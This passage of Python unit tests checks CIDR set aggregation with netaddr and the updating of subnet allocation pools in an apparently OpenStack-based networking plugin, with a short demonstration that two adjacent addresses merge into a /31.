    old_cidr_set = netaddr.IPSet(['192.168.10.6'])
    new_cidr_set, added_cidr, deleted_cidr = \
        self.app._get_cidr_changes_after_adding_addresses(
            old_cidr_set, ['192.168.10.7'])
    expected_new_cidr_set = netaddr.IPSet(['192.168.10.6/31'])
    expected_added_cidr = {netaddr.IPNetwork('192.168.10.6/31')}
    expected_deleted_cidr = {netaddr.IPNetwork('192.168.10.6/32')}
    self.assertEqual(new_cidr_set, expected_new_cidr_set)
    self.assertEqual(added_cidr, expected_added_cidr)
    self.assertEqual(deleted_cidr, expected_deleted_cidr)

    # remove one address
    old_cidr_set = new_cidr_set
    new_cidr_set, added_cidr, deleted_cidr = \
        self.app._get_cidr_changes_after_removing_addresses(
            old_cidr_set, ['192.168.10.7'])
    expected_new_cidr_set = netaddr.IPSet(['192.168.10.6/32'])
    expected_added_cidr = {netaddr.IPNetwork('192.168.10.6/32')}
    expected_deleted_cidr = {netaddr.IPNetwork('192.168.10.6/31')}
    self.assertEqual(new_cidr_set, expected_new_cidr_set)
    self.assertEqual(added_cidr, expected_added_cidr)
    self.assertEqual(deleted_cidr, expected_deleted_cidr)

    # update addresses
    old_cidr_set = new_cidr_set
    new_cidr_set, added_cidr, deleted_cidr = \
        self.app._get_cidr_changes_after_updating_addresses(
            old_cidr_set, ['192.168.10.7'], ['192.168.10.6'])
    expected_new_cidr_set = netaddr.IPSet(['192.168.10.7/32'])
    expected_added_cidr = {netaddr.IPNetwork('192.168.10.7/32')}
    expected_deleted_cidr = {netaddr.IPNetwork('192.168.10.6/32')}
    self.assertEqual(new_cidr_set, expected_new_cidr_set)
    self.assertEqual(added_cidr, expected_added_cidr)
    self.assertEqual(deleted_cidr, expected_deleted_cidr)
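# Hedged demonstration of the aggregation the test above asserts: adding the
# neighbouring address 192.168.10.7 to a set already holding 192.168.10.6
# collapses both hosts into a single /31.
import netaddr

cidr_set = netaddr.IPSet(['192.168.10.6'])
cidr_set.add('192.168.10.7')
print([str(c) for c in cidr_set.iter_cidrs()])   # ['192.168.10.6/31']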
def test_update_allocation_pools(self):
    og = CONF.QUARK.allow_allocation_pool_update
    CONF.set_override('allow_allocation_pool_update', True, 'QUARK')
    cidr = "192.168.1.0/24"
    ip_network = netaddr.IPNetwork(cidr)
    network = dict(name="public", tenant_id="fake", network_plugin="BASE")
    network = {"network": network}
    subnet = dict(id=1, ip_version=4, next_auto_assign_ip=2,
                  cidr=cidr, first_ip=ip_network.first,
                  last_ip=ip_network.last, ip_policy=None,
                  tenant_id="fake")
    subnet = {"subnet": subnet}
    with self._stubs(network, subnet) as (net, sub1):
        subnet = subnet_api.get_subnet(self.context, 1)
        start_pools = subnet['allocation_pools']
        new_pools = [
            [dict(start='192.168.1.10', end='192.168.1.50')],
            [dict(start='192.168.1.5', end='192.168.1.25')],
            [dict(start='192.168.1.50', end='192.168.1.51')],
            [dict(start='192.168.1.50', end='192.168.1.51'),
             dict(start='192.168.1.100', end='192.168.1.250')],
            [dict(start='192.168.1.50', end='192.168.1.51')],
            start_pools,
        ]
        prev_pool = start_pools
        for pool in new_pools:
            subnet_update = {"subnet": dict(allocation_pools=pool)}
            subnet = subnet_api.update_subnet(self.context, 1,
                                              subnet_update)
            self.assertNotEqual(prev_pool, subnet['allocation_pools'])
            self.assertEqual(pool, subnet['allocation_pools'])
            policies = policy_api.get_ip_policies(self.context)
            self.assertEqual(1, len(policies))
            policy = policies[0]
            ip_set = netaddr.IPSet()
            for ip in policy['exclude']:
                ip_set.add(netaddr.IPNetwork(ip))
            for extent in pool:
                for ip in netaddr.IPRange(extent['start'], extent['end']):
                    self.assertFalse(ip in ip_set)
            prev_pool = pool
        CONF.set_override('allow_allocation_pool_update', og, 'QUARK')